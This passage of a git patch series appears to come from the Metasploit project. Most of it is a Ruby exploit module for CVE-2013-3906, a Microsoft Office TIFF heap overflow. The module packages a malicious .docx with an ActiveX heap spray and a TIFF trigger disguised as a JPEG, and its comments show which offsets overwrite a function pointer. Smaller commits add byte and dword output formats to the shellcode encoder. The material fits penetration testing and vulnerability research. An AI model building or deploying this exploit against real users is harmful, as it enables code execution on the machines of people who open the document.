+    # Number of entries                     = 17d
+    # Entry[0]  NewSubFileType              = 0
+    # Entry[1]  ImageWidth                  = 256d
+    # Entry[2]  ImageHeight                 = 338d
+    # Entry[3]  BitsPerSample               = 8 8 8
+    # Entry[4]  Compression                 = JPEG (6)
+    # Entry[5]  Photometric Interpretation  = RGP
+    # Entry[6]  StripOffsets                = 68 entries (349 bytes)
+    # Entry[7]  SamplesPerPixel             = 3
+    # Entry[8]  RowsPerStrip                = 5
+    # Entry[9]  StripByteCounts             = 68 entries (278 bytes)
+    # Entry[10] XResolution                 = 96d
+    # Entry[11] YResolution                 = 96d
+    # Entry[12] Planar Configuration        = Clunky
+    # Entry[13] Resolution Unit             = Inch
+    # Entry[14] Predictor                   = None
+    # Entry[15] JPEGInterchangeFormatLength = 5252h (1484h)
+    # Entry[16] JPEGInterchangeFormat       = 13636d
+
+    # Notes:
+    # These values are extracted from the file to calculate the HeapAlloc size that result in the overflow:
+    # - JPEGInterchangeFormatLength
+    # - DWORD at offset 3324h (0xffffb898), no documentation for this
+    # - DWORDS after offset 3328h, no documentation for these, either.
+    # The DWORD at offset 4874h is what ends up overwriting the function pointer by the memcpy
+    # The trigger is really a TIF file, but is named as a JPEG in the docx package
+
+    buf = ''
+    path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906", "word", "media", "image1.jpeg")
+    ::File.open(path, "rb") do |f|
+      buf = f.read
+    end
+
+    buf
+  end
+
+
+  #
+  # Creates an ActiveX bin that will be used as a spray in Office
+  #
+  def make_activex_bin
+    #
+    # How an ActiveX bin is referred:
+    # document.xml.rels -> ActiveX[num].xml -> activeX[num].xml.rels -> ActiveX[num].bin
+    # Every bin is a Microsoft Compound Document File:
+    # http://www.openoffice.org/sc/compdocfileformat.pdf
+
+    # The bin file
+    mscd  = ''
+    mscd << [0xe011cfd0].pack('V')      # File identifier (first 4 byte)
+    mscd << [0xe11ab1a1].pack('V')      # File identifier (second 4 byte)
+    mscd << [0x00000000].pack('V') * 4  # Unique Identifier
+    mscd << [0x003e].pack('v')          # Revision number
+    mscd << [0x0003].pack('v')          # Version number
+    mscd << [0xfffe].pack('v')          # Byte order: Little-Endian
+    mscd << [0x0009].pack('v')          # Sector size
+    mscd << [0x0006].pack('v')          # Size of a short-sector
+    mscd << "\x00" * 10                 # Not used
+    mscd << [0x00000001].pack('V')      # Total number of sectors
+    mscd << [0x00000001].pack('V')      # SecID for the first sector
+    mscd << [0x00000000].pack('V')      # Not used
+    mscd << [0x00001000].pack('V')      # Minimum size of a standard stream
+    mscd << [0x00000002].pack('V')      # Sec ID of first sector
+    mscd << [0x00000001].pack('V')      # Total number of sectors for the short-sector table
+    mscd << [0xfffffffe].pack('V')      # SecID of first sector of the mastser sector table
+    mscd << [0x00000000].pack('V')      # Total number of sectors for master sector talbe
+    mscd << [0x00000000].pack('V')      # SecIDs
+    mscd << [0xffffffff].pack('V') * 4 * 59 # SecIDs
+    mscd << Rex::Text.to_unicode("Root Entry")
+    mscd << [0x00000000].pack('V') * 11
+    mscd << [0x0016].pack('v')          # Valid range of the previous char array
+    mscd << "\x05"                      # Type of entry (Root Storage Entry)
+    mscd << "\x00"                      # Node colour of the entry (red)
+    mscd << [0xffffffff].pack('V')      # DirID of the left child node
+    mscd << [0xffffffff].pack('V')      # DirID of the right child node
+    mscd << [0x00000001].pack('V')      # DirID of the root node entry
+    mscd << [0x1efb6596].pack('V')
+    mscd << [0x11d1857c].pack('V')
+    mscd << [0xc0006ab1].pack('V')
+    mscd << [0x283628f0].pack('V')
+    mscd << [0x00000000].pack('V') * 3
+    mscd << [0x287e3070].pack('V')
+    mscd << [0x01ce2654].pack('V')
+    mscd << [0x00000003].pack('V')
+    mscd << [0x00000100].pack('V')
+    mscd << [0x00000000].pack('V')
+    mscd << Rex::Text.to_unicode("Contents")
+    mscd << [0x00000000].pack('V') * 12
+    mscd << [0x01020012].pack('V')
+    mscd << [0xffffffff].pack('V') * 3
+    mscd << [0x00000000].pack('V') * 10
+    mscd << [0x000000e4].pack('V')
+    mscd << [0x00000000].pack('V') * 18
+    mscd << [0xffffffff].pack('V') * 3
+    mscd << [0x00000000].pack('V') * 29
+    mscd << [0xffffffff].pack('V') * 3
+    mscd << [0x00000000].pack('V') * 12
+    mscd << [0x00000001].pack('V')
+    mscd << [0x00000002].pack('V')
+    mscd << [0x00000003].pack('V')
+    mscd << [0xfffffffe].pack('V')
+    mscd << [0xffffffff].pack('V') * 52
+    # mscd << "PAYLOAD"
+
+    mscd
+  end
+
+
+  #
+  # Creates an activeX[num].xml file
+  # @param rid [String] The relationship ID (example: rId1)
+  # @return [String] XML document
+  #
+  def make_activex_xml(rid)
+    attrs = {
+      'ax:classid'     => "{1EFB6596-857C-11D1-B16A-00C0F0283628}",
+      'ax:license'     => "9368265E-85FE-11d1-8BE3-0000F8754DA1",
+      'ax:persistence' => "persistStorage",
+      'r:id'           => rid,
+      'xmlns:ax'       => "http://schemas.microsoft.com/office/2006/activeX",
+      'xmlns:r'        => "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
+    }
+    md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>")
+    builder = ::Nokogiri::XML::Builder.with(md) do |xml|
+      xml.custom_root("ax")
+      xml.ocx(attrs)
+    end
+
+    builder.to_xml
+  end
+
+
+  #
+  # Creates an activeX[num].xml.rels
+  # @param relationships [Array] A collection of hashes with each containing:
+  #                              :id, :type, :target
+  # @return [String] XML document
+  #
+  def make_activex_xml_reals(rid, target_bin)
+    acx_type = "http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary"
+    md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
+    builder = ::Nokogiri::XML::Builder.with(md) do |xml|
+    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
+        xml.Relationship({:Id=>rid, :Type=>acx_type, :Target=>target_bin})
+    end
+    end
+
+    builder.to_xml
+  end
+
+  #
+  # Creates a document.xml.reals file
+  # @param relationships [Array] A collection of hashes with each containing:
+  #                              :id, :type, and :target
+  # @return [String] XML document
+  #
+  def make_doc_xml_reals(relationships)
+    md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
+    builder = ::Nokogiri::XML::Builder.with(md) do |xml|
+    xml.Relationships('xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types") do
+      relationships.each do |r|
+        xml.Relationship({:Id=>r[:id], :Type=>r[:type], :Target=>r[:target]})
+      end
+    end
+    end
+
+    builder.to_xml
+  end
+
+
+  #
+  # Creates a document.xml file
+  # @param pre_defs [Array]
+  # @param activex [Array]
+  # @param tiff_file [Array]
+  # @return [String] XML document
+  #
+  def init_doc_xml(pre_defs, activex, tiff_file)
+    # Get all the required pre-defs
+    chart_rids = []
+    pre_defs.select { |e| chart_rids << e[:rid] }
+
+    # Get all the ActiveX RIDs
+    ax_rids = []
+    activex.select { |e| ax_rids << e[:rid] }
+
+    # Get the TIFF RID
+    tiff_rid = tiff_file[:rid]
+
+
+    # Documentation on how this is crafted:
+    # http://msdn.microsoft.com/en-us/library/office/gg278308.aspx
+    doc_attrs = {
+      'xmlns:ve'  => "http://schemas.openxmlformats.org/markup-compatibility/2006",
+      'xmlns:o'   => "urn:schemas-microsoft-com:office:office",
+      'xmlns:r'   => "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
+      'xmlns:m'   => "http://schemas.openxmlformats.org/officeDocument/2006/math",
+      'xmlns:v'   => "urn:schemas-microsoft-com:vml",
+      'xmlns:wp'  => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",
+      'xmlns:w10' => "urn:schemas-microsoft-com:office:word",
+      'xmlns:w'   => "http://schemas.openxmlformats.org/wordprocessingml/2006/main",
+      'xmlns:wne' => "http://schemas.microsoft.com/office/word/2006/wordml",
+      'xmlns:a'   => "http://schemas.openxmlformats.org/markup-compatibility/2006",
+      'xmlns:c'   => "http://schemas.openxmlformats.org/markup-compatibility/2006"
+    }
+
+    p_attrs = {
+      'w:rsidR'        => "00F8254F",
+      'w:rsidRDefault' => "00D15BD0"
+    }
+
+    md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
+    builder = ::Nokogiri::XML::Builder.with(md) do |xml|
+      xml.custom_root("w")
+
+      xml.document(doc_attrs) do
+        xml.body do
+          # Paragraph (ActiveX)
+          xml.p(p_attrs) do
+            # Paragraph properties
+            xml.pPr do
+              # Run properties
+              xml.rPr do
+                xml.lang({'w:val' => "en-US"})
+              end
+
+              # The "spray" is contained in these "run" elements
+              xml.r do
+              end
+            end
+          end
+
+          # Paragraph (Charts)
+          xml.p(p_attrs) do
+            xml.pPr do
+              xml.r do
+                xml.rPr do
+                  xml.noProof
+                  xml.lang({'w:val' => "en-US"})
+                end
+                xml.drawing do
+                  xml.inline({'distT'=>"0", 'distB'=>"0", 'distL'=>"0", 'distR'=>"0"}) do
+                    #xml.extend({'cx'=>'1', 'cy'=>'1'})
+                    xml.effectExtend({'l'=>"1", 't'=>"0", 'r'=>"1", 'b'=>"0"})
+                    xml.docPr({'id'=>'1', 'name' => "drawing 1"})
+                    xml.cNvGraphicFramePr
+                    xml['a'].graphic({'xmlns'=>"http://schemas.openxmlformats.org/drawingml/2006/main"}) do
+                      xml['a'].graphicData({'uri'=>"http://schemas.openxmlformats.org/drawingml/2006/chart"}) do
+                        xml['c'].chart({'xmlns:c'=>"http://schemas.openxmlformats.org/drawingml/2006/chart", 'xmlns:r'=>"http://schemas.openxmlformats.org/officeDocument/2006/relationships"})
+                      end
+                    end
+                  end
+                end
+              end
+            end
+          end
+
+          # Paragraph (TIFF)
+
+        end
+      end
+    end
+
+    builder.to_xml
+  end
+
+  #
+  # Creates a [Content.Types].xml file located in the parent directory
+  # @param overrides [Array] A collection of hashes with each containing
+  #                          the :PartName and :ContentType info
+  # @return [String] XML document
+  #
+  def make_contenttype_xml(overrides)
+    contenttypes = [
+      {
+        :Extension   =>"rels",
+        :ContentType =>"application/vnd.openxmlformats-package.relationships+xml"
+      },
+      {
+        :Extension   =>"xml",
+        :ContentType =>"application/xml"
+      },
+      {
+        :Extension   =>"jpeg",
+        :Contenttype =>"image/jpeg"
+      },
+      {
+        :Extension   => "bin",
+        :ContentType => "application/vnd.ms-office.activeX"
+      },
+      {
+        :Extension  => "xlsx",
+        :ContentType => "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
+      }
+    ]
+
+    md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>")
+    builder = ::Nokogiri::XML::Builder.with(md) do |xml|
+    xml.root({'xmlns'=>"http://schemas.openxmlformats.org/package/2006/content-types"}) do
+      # Default extensions
+      contenttypes.each do |contenttype|
+        xml.Override(contenttype)
+      end
+
+      # Additional overrides
+      overrides.each do |override|
+        xml.Override({:PartName => override[:PartName], :ContentType => override[:ContentType]})
+      end
+    end
+    end
+
+    builder.to_xml
+  end
+
+
+  #
+  # Pre-define some items that already exist in the data directory
+  # This is more for the document.xml.rels file
+  #
+  def init_pre_defs
+    last_rid = 0
+
+    pre_defs = []
+    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}styles",      :fname => "word/styles.xml"}
+    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}settings",    :fname => "word/settings.xml"}
+    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}webSettings", :fname => "word/webSettings.xml"}
+    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}theme",       :fname => "word/theme/theme1.xml"}
+    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart1.xml"}
+    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart2.xml"}
+    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart3.xml"}
+    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart4.xml"}
+    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart5.xml"}
+    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart6.xml"}
+
+    return last_rid, pre_defs
+  end
+
+
+  #
+  # Manually create everything manually in the ActiveX directory
+  #
+  def init_activex_files(last_rid)
+    activex = []
+
+    1.times do |i|
+      id       = last_rid + i
+      last_rid = id
+      rid      = "rId#{id.to_s}"
+
+      bin  = {
+        :fname => "word/activeX/ActiveX#{id.to_s}.bin",
+        :bin => make_activex_bin
+      }
+
+      xml  = {
+        :fname => "word/activeX/ActiveX#{id.to_s}.xml",
+        :xml => make_activex_xml(rid)
+      }
+
+      rels = {
+        :fname => "word/activeX/_rels/activeX#{id.to_s}.xml.rels",
+        :rels => make_activex_xml_reals(rid, "activeX#{id.to_s}.bin")
+      }
+
+      ct   = "application/vnd.ms-office.activeX+xml"
+      type = "#{@schema}control"
+
+      activex << {
+        :rid          => rid,
+        :bin          => bin,
+        :xml          => xml,
+        :rels         => rels,
+        :content_type => ct
+      }
+    end
+
+    return last_rid, activex
+  end
+
+
+  #
+  # Create a [Content_Types.xml], each node contains these attributes:
+  # :PartName     The path to an ActiveX XML file
+  # :ContentType  The contenttype of the XML file
+  #
+  def init_contenttype_xml_file(activex)
+    overrides = []
+    activex.each do |obj|
+      overrides << {:PartName => obj[:xml][:fname], :ContentType => obj[:content_type]}
+    end
+
+    {:fname => "[Content_Types].xml", :data => make_contenttype_xml(overrides)}
+  end
+
+
+  #
+  # Creates the tiff file
+  #
+  def init_tiff_file(last_rid)
+    {
+      :rid   => "rId#{(last_rid + 1).to_s}",
+      :fname => "word/media/image1.jpeg",
+      :data  => make_tiff,
+      :type  => "#{@schema}image"
+    }
+  end
+
+  #
+  # Create the document.xml.rels file
+  #
+  def init_doc_xml_reals_file(pre_defs, activex, tiff)
+    reals = []
+    pre_defs.each do |obj|
+      reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^word\//, '')}
+    end
+
+    activex.each do |obj|
+      reals << {:id => obj[:rid], :tyoe => obj[:type], :target => obj[:xml][:fname].gsub(/^word\//, '')}
+    end
+
+    reals << {:id => tiff[:rid], :type => tiff[:type], :target => tiff[:fname].gsub(/^word\//, '')}
+
+    {:fname => "word/_rels/document.xml.rels", :data => make_doc_xml_reals(reals)}
+  end
+
+  #
+  # Loads a fiile
+  #
+  def read_file(fname)
+    buf = ''
+    ::File.open(fname, "rb") do |f|
+      buf << f.read
+    end
+
+    buf
+  end
+
+
+  #
+  # Packages everything to docx
+  #
+  def make_docx(path)
+    print_status("Initializing files...")
+    last_rid, pre_defs = init_pre_defs
+    last_rid, activex  = init_activex_files(last_rid)
+    ct_xml_file        = init_contenttype_xml_file(activex)
+    tiff_file          = init_tiff_file(last_rid)
+    doc_xml_reals_file = init_doc_xml_reals_file(pre_defs, activex, tiff_file)
+    doc_xml            = init_doc_xml(pre_defs, activex, tiff_file)
+
+    zip = Rex::Zip::Archive.new
+    Dir["#{path}/**/**"].each do |file|
+      p = file.sub(path+'/','')
+
+      if File.directory?(file)
+        print_status("Packing directory: #{p}")
+        zip.add_file(p)
+      else
+        print_status("Packing file: #{p}")
+        zip.add_file(p, read_file(file))
+      end
+    end
+
+    activex.each do |ax|
+      ax_bin  = ax[:bin]
+      ax_xml  = ax[:xml]
+      ax_rels = ax[:rels]
+
+      print_status("Packing file: #{ax_bin[:fname]}")
+      zip.add_file(ax_bin[:fname], ax_bin[:bin])
+
+      print_status("Packing file: #{ax_xml[:fname]}")
+      zip.add_file(ax_xml[:fname], ax_xml[:xml])
+
+      print_status("Packing file: #{ax_rels[:fname]}")
+      zip.add_file(ax_rels[:fname], ax_rels[:rels])
+    end
+
+    print_status("Packing file: #{ct_xml_file[:fname]}")
+    zip.add_file(ct_xml_file[:fname], ct_xml_file[:data])
+
+    print_status("Packing file: #{tiff_file[:fname]}")
+    zip.add_file(tiff_file[:fname], tiff_file[:data])
+
+    print_status("Packing file: #{doc_xml_reals_file[:fname]}")
+    zip.add_file(doc_xml_reals_file[:fname], doc_xml_reals_file[:data])
+
+    zip.pack
+  end
+
+  def exploit
+    @schema = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
+    path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-3906")
+    docx = make_docx(path)
+    file_create(docx)
+  end
+
+end
+

From 742c52711a7fb1e2c3b5259835c870b5885094b1 Mon Sep 17 00:00:00 2001
From: corelanc0d3r <peter.ve@corelan.be>
Date: Wed, 20 Nov 2013 22:36:17 +0100
Subject: [PATCH 037/217] added 2 new output types for msfencode: num and dword

---
 lib/msf/base/simple/buffer.rb | 12 +++++++--
 lib/rex/text.rb               | 46 +++++++++++++++++++++++++++++++++++
 2 files changed, 56 insertions(+), 2 deletions(-)

diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb
index fe34bfbd08..95fba9d69f 100644
--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -16,11 +16,15 @@ module Buffer
 
   #
   # Serializes a buffer to a provided format.  The formats supported are raw,
-  # ruby, perl, bash, c, js_be, js_le, java and psh
+  # num, dword, ruby, python, perl, bash, c, js_be, js_le, java and psh
   #
   def self.transform(buf, fmt = "ruby")
     case fmt
       when 'raw'
+      when 'num'
+        buf = Rex::Text.to_num(buf)
+      when 'dword', 'dw'
+        buf = Rex::Text.to_dword(buf)
       when 'python', 'py'
         buf = Rex::Text.to_python(buf)
       when 'ruby', 'rb'
@@ -54,11 +58,13 @@ module Buffer
 
   #
   # Creates a comment using the supplied format.  The formats supported are
-  # raw, ruby, perl, bash, js_be, js_le, c, and java.
+  # raw, ruby, python, perl, bash, js_be, js_le, c, and java.
   #
   def self.comment(buf, fmt = "ruby")
     case fmt
       when 'raw'
+      when 'num', 'dword', 'dw'
+        buf = Rex::Text.to_num_comment(buf)
       when 'ruby', 'rb', 'python', 'py'
         buf = Rex::Text.to_ruby_comment(buf)
       when 'perl', 'pl'
@@ -85,6 +91,8 @@ module Buffer
   #
   def self.transform_formats
     ['raw',
+    'num',
+    'dword','dw',
     'ruby','rb',
     'perl','pl',
     'bash','sh',
diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index 144ef80a67..48936d5b32 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -115,6 +115,52 @@ module Text
     return hexify(str, wrap, '"', '" +', "#{name} = \n", '"')
   end
 
+  #
+  # Creates a comma separated list of numbers
+  #
+  def self.to_num(str, wrap = DefaultWrap)
+    code = str.unpack('C*')
+    buff = ""
+    0.upto(code.length-1) do |byte|
+      if(byte % 15 == 0) and (buff.length > 0)
+        buff << "\r\n"
+      end
+      buff << sprintf('0x%.2x, ', code[byte])
+    end
+    # strip , at the end
+    buff = buff.chomp(', ')
+    buff << "\r\n"
+    return buff
+  end
+
+  #
+  # Creates a comma separated list of dwords
+  #
+  def self.to_dword(str, wrap = DefaultWrap)
+    code = str
+    alignnr = str.length % 4
+    if (alignnr > 0)
+      code << "\x00" * (4 - alignnr)
+    end
+    codevalues = Array.new
+    code.split("").each_slice(4) do |chars4|
+      chars4 = chars4.join("")
+      dwordvalue = chars4.unpack('*V')
+      codevalues.push(dwordvalue[0])
+    end
+    buff = ""
+    0.upto(codevalues.length-1) do |byte|
+      if(byte % 8 == 0) and (buff.length > 0)
+        buff << "\r\n"
+      end
+      buff << sprintf('0x%.8x, ', codevalues[byte])
+    end
+     # strip , at the end
+    buff = buff.chomp(', ')
+    buff << "\r\n"
+    return buff
+  end
+
   #
   # Creates a ruby-style comment
   #

From 0ea0dc168c5a81250fe091202af62b59c2eb8130 Mon Sep 17 00:00:00 2001
From: corelanc0d3r <peter.ve@corelan.be>
Date: Wed, 20 Nov 2013 23:10:55 +0100
Subject: [PATCH 038/217] set _comment method to js for num and dword

---
 lib/msf/base/simple/buffer.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb
index 95fba9d69f..35b4682f71 100644
--- a/lib/msf/base/simple/buffer.rb
+++ b/lib/msf/base/simple/buffer.rb
@@ -64,7 +64,7 @@ module Buffer
     case fmt
       when 'raw'
       when 'num', 'dword', 'dw'
-        buf = Rex::Text.to_num_comment(buf)
+        buf = Rex::Text.to_js_comment(buf)
       when 'ruby', 'rb', 'python', 'py'
         buf = Rex::Text.to_ruby_comment(buf)
       when 'perl', 'pl'

From e13e457d8fbf90e5ab0aa58949bc30880c1a6044 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 20 Nov 2013 17:11:13 -0600
Subject: [PATCH 039/217] Progress

---
 .../windows/fileformat/mswin_tiff_overflow.rb | 122 ++++++++++++------
 1 file changed, 84 insertions(+), 38 deletions(-)

diff --git a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
index 5b9cdb06d7..bf41b04eb1 100644
--- a/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
+++ b/modules/exploits/windows/fileformat/mswin_tiff_overflow.rb
@@ -219,7 +219,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'ax:persistence' => "persistStorage",
       'r:id'           => rid,
       'xmlns:ax'       => "http://schemas.microsoft.com/office/2006/activeX",
-      'xmlns:r'        => "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
+      'xmlns:r'        => @schema
     }
     md = ::Nokogiri::XML("<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>")
     builder = ::Nokogiri::XML::Builder.with(md) do |xml|
@@ -269,6 +269,22 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
 
+  #
+  # Creates a _rels/.rels file
+  #
+  def init_rels(doc_xml, doc_props)
+    rels = []
+    rels << doc_xml
+    rels << doc_props
+
+    {
+      :fname => "_rels/.rels",
+      # The .rels generates the same format like make_doc_xml_reals, we'll just use that
+      :data  => make_doc_xml_reals(rels.flatten)
+    }
+  end
+
+
   #
   # Creates a document.xml file
   # @param pre_defs [Array]
@@ -276,7 +292,7 @@ class Metasploit3 < Msf::Exploit::Remote
   # @param tiff_file [Array]
   # @return [String] XML document
   #
-  def init_doc_xml(pre_defs, activex, tiff_file)
+  def init_doc_xml(last_rid, pre_defs, activex, tiff_file)
     # Get all the required pre-defs
     chart_rids = []
     pre_defs.select { |e| chart_rids << e[:rid] }
@@ -294,7 +310,7 @@ class Metasploit3 < Msf::Exploit::Remote
     doc_attrs = {
       'xmlns:ve'  => "http://schemas.openxmlformats.org/markup-compatibility/2006",
       'xmlns:o'   => "urn:schemas-microsoft-com:office:office",
-      'xmlns:r'   => "http://schemas.openxmlformats.org/officeDocument/2006/relationships",
+      'xmlns:r'   => @schema,
       'xmlns:m'   => "http://schemas.openxmlformats.org/officeDocument/2006/math",
       'xmlns:v'   => "urn:schemas-microsoft-com:vml",
       'xmlns:wp'  => "http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing",
@@ -347,7 +363,7 @@ class Metasploit3 < Msf::Exploit::Remote
                     xml.cNvGraphicFramePr
                     xml['a'].graphic({'xmlns'=>"http://schemas.openxmlformats.org/drawingml/2006/main"}) do
                       xml['a'].graphicData({'uri'=>"http://schemas.openxmlformats.org/drawingml/2006/chart"}) do
-                        xml['c'].chart({'xmlns:c'=>"http://schemas.openxmlformats.org/drawingml/2006/chart", 'xmlns:r'=>"http://schemas.openxmlformats.org/officeDocument/2006/relationships"})
+                        xml['c'].chart({'xmlns:c'=>"http://schemas.openxmlformats.org/drawingml/2006/chart", 'xmlns:r'=>@schema})
                       end
                     end
                   end
@@ -362,7 +378,12 @@ class Metasploit3 < Msf::Exploit::Remote
       end
     end
 
-    builder.to_xml
+    {
+      :rid   => "rId#{last_rid.to_s}",
+      :type  => "#{@schema}/officeDocument",
+      :fname => "word/document.xml",
+      :xml   => builder.to_xml
+    }
   end
 
   #
@@ -415,25 +436,35 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
   #
-  # Pre-define some items that already exist in the data directory
-  # This is more for the document.xml.rels file
+  # Pre-define some items that will be used in .rels
   #
-  def init_pre_defs
-    last_rid = 0
+  def init_doc_props(last_rid)
+    items = []
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/extended-properties", :fname => "docProps/app.xml"}
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/core-properties", :fname => "docProps/core.xml"}
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/officeDocument", :fname => "word/document.xml"}
 
-    pre_defs = []
-    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}styles",      :fname => "word/styles.xml"}
-    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}settings",    :fname => "word/settings.xml"}
-    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}webSettings", :fname => "word/webSettings.xml"}
-    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}theme",       :fname => "word/theme/theme1.xml"}
-    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart1.xml"}
-    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart2.xml"}
-    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart3.xml"}
-    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart4.xml"}
-    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart5.xml"}
-    pre_defs << {:rid => (last_rid += 1), :type => "#{@schema}chart",       :fname => "word/charts/chart6.xml"}
+    return last_rid, items
+  end
 
-    return last_rid, pre_defs
+
+  #
+  # Pre-define some items that will be used in document.xml.rels
+  #
+  def init_doc_xml_rels_items(last_rid)
+    items = []
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/styles",      :fname => "word/styles.xml"}
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/settings",    :fname => "word/settings.xml"}
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/webSettings", :fname => "word/webSettings.xml"}
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/theme",       :fname => "word/theme/theme1.xml"}
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart1.xml"}
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart2.xml"}
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart3.xml"}
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart4.xml"}
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart5.xml"}
+    items << {:rid => (last_rid += 1), :type => "#{@schema}/chart",       :fname => "word/charts/chart6.xml"}
+
+    return last_rid, items
   end
 
 
@@ -443,7 +474,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def init_activex_files(last_rid)
     activex = []
 
-    1.times do |i|
+    40.times do |i|
       id       = last_rid + i
       last_rid = id
       rid      = "rId#{id.to_s}"
@@ -464,14 +495,15 @@ class Metasploit3 < Msf::Exploit::Remote
       }
 
       ct   = "application/vnd.ms-office.activeX+xml"
-      type = "#{@schema}control"
+      type = "#{@schema}/control"
 
       activex << {
         :rid          => rid,
         :bin          => bin,
         :xml          => xml,
         :rels         => rels,
-        :content_type => ct
+        :content_type => ct,
+        :type         => type
       }
     end
 
@@ -498,12 +530,14 @@ class Metasploit3 < Msf::Exploit::Remote
   # Creates the tiff file
   #
   def init_tiff_file(last_rid)
-    {
-      :rid   => "rId#{(last_rid + 1).to_s}",
+    tiff_data = {
+      :rid   => "rId#{(last_rid += 1).to_s}",
       :fname => "word/media/image1.jpeg",
       :data  => make_tiff,
-      :type  => "#{@schema}image"
+      :type  => "#{@schema}/image"
     }
+
+    return last_rid, tiff_data
   end
 
   #
@@ -512,11 +546,11 @@ class Metasploit3 < Msf::Exploit::Remote
   def init_doc_xml_reals_file(pre_defs, activex, tiff)
     reals = []
     pre_defs.each do |obj|
-      reals << {:id => obj[:id], :type => obj[:type], :target => obj[:fname].gsub(/^word\//, '')}
+      reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:fname].gsub(/^word\//, '')}
     end
 
     activex.each do |obj|
-      reals << {:id => obj[:rid], :tyoe => obj[:type], :target => obj[:xml][:fname].gsub(/^word\//, '')}
+      reals << {:id => obj[:rid], :type => obj[:type], :target => obj[:xml][:fname].gsub(/^word\//, '')}
     end
 
     reals << {:id => tiff[:rid], :type => tiff[:type], :target => tiff[:fname].gsub(/^word\//, '')}
@@ -542,12 +576,15 @@ class Metasploit3 < Msf::Exploit::Remote
   #
   def make_docx(path)
     print_status("Initializing files...")
-    last_rid, pre_defs = init_pre_defs
-    last_rid, activex  = init_activex_files(last_rid)
-    ct_xml_file        = init_contenttype_xml_file(activex)
-    tiff_file          = init_tiff_file(last_rid)
-    doc_xml_reals_file = init_doc_xml_reals_file(pre_defs, activex, tiff_file)
-    doc_xml            = init_doc_xml(pre_defs, activex, tiff_file)
+    last_rid = 1
+    last_rid, activex            = init_activex_files(last_rid)
+    last_rid, doc_xml_rels_items = init_doc_xml_rels_items(last_rid)
+    ct_xml_file                  = init_contenttype_xml_file(activex)
+    last_rid, tiff_file          = init_tiff_file(last_rid)
+    last_rid, doc_props          = init_doc_props(last_rid)
+    doc_xml_reals_file           = init_doc_xml_reals_file(doc_xml_rels_items, activex, tiff_file)
